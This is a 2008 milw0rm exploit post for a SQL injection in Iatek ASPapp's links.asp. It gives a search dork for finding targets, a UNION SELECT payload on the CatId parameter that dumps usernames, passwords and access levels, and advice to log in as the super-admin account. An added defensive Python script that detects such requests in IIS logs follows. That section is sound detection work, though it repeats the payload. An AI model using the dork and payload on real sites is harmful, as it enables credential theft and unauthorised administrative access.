..##.....##
...##...##
....##.##
.....###CoRPITX
.....###
....##.##
...##...##
..##.....##
-----------------Turkey--------------------------------------
--------- www.Hayalet-hack.com-------------------------------
----------www.xcorpitx-hack.com------------------------------
Iatek | ASPapp - links.asp (CatId) SQL Injection Vulnerability
-------------------------------------------------
You'll see lots of users like this, but accesslevel will help you see which one is the admin.
-------------------------------------------------------------
----------------example--------------------------------------
Links › guest   › 12      › 1 user
Links › editor  › editor  › 2 moderator
Links › manager › manager › 2 moderator
Links › surco   › surco   › 2 moderator
Links › admin   › admin   › 3 admin
Links › ovivas  › ovivas  › 4 super-admin ----- we'll log in with this username
-------------------------------------------------------------
I mean, when you see a big number, 4 or 5, you can use this username and password.
-------------------------------------------------------------
------- dork - ''links.asp?CatId''
------- exploit-
------- admin login-
------- www.xxx.com/path/login.asp?ret_page=%2Fzmicer%2Fweb%2Fadmin%2Easp%3F
-------
-------------------------------------------------------------
links.asp?CatId=-99999%20UNION%20SELECT%20null,accesslevel,null,null,user_name,%205%20,password,null%20FROM%20Users
-------------------------------------------------------------
thanx- str0ke-D3ng3siz-pc faresi-s@bun-Hayalet-Turque-

# milw0rm.com [2008-03-19]
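
A defender-side check for the flaw described above, as an added example that is not part of the original advisory: it scans IIS W3C log lines for links.asp requests whose CatId is not a plain non-negative integer. The log field layout, the sample lines, the function name and the assumption that category ids are short non-negative integers are all constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Constructed IIS W3C log lines; assumed field order:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2008-03-19 10:01:02 192.0.2.10 GET /links.asp CatId=7 200
2008-03-19 10:01:09 192.0.2.44 GET /links.asp CatId=-99999%20UNION%20SELECT%20null,accesslevel,null,null,user_name,%205%20,password,null%20FROM%20Users 200
2008-03-19 10:02:30 192.0.2.10 GET /default.asp - 200
2008-03-19 10:03:11 192.0.2.51 GET /Links.asp catid=12%27 500
"""

# Assumption: a legitimate category id is a short non-negative integer.
NUMERIC_ID = re.compile(r"\d{1,9}")
SQL_KEYWORDS = re.compile(r"\b(union|select|from)\b", re.IGNORECASE)


def flag_catid_requests(log_text):
    """Return (client_ip, decoded_value, reason) for suspicious links.asp hits."""
    findings = []
    for line in log_text.splitlines():
        if not line or line.startswith("#"):
            continue  # skip blank lines and W3C header directives
        fields = line.split()
        if len(fields) < 7:
            continue  # not in the assumed field layout
        client_ip, stem, query = fields[2], fields[4], fields[5]
        if not stem.lower().endswith("/links.asp"):
            continue
        # parse_qsl URL-decodes values, so %20 and %27 are compared as text.
        for name, value in parse_qsl(query, keep_blank_values=True):
            if name.lower() != "catid":
                continue
            if NUMERIC_ID.fullmatch(value):
                continue  # well-formed id, nothing to report
            reason = "sql-keywords" if SQL_KEYWORDS.search(value) else "non-numeric"
            findings.append((client_ip, value, reason))
    return findings


if __name__ == "__main__":
    for hit in flag_catid_requests(SAMPLE_LOG):
        print(hit)
```

The same integer-only rule, enforced in links.asp before CatId reaches the query (together with a parameterized query), is what closes the injection rather than only detecting it.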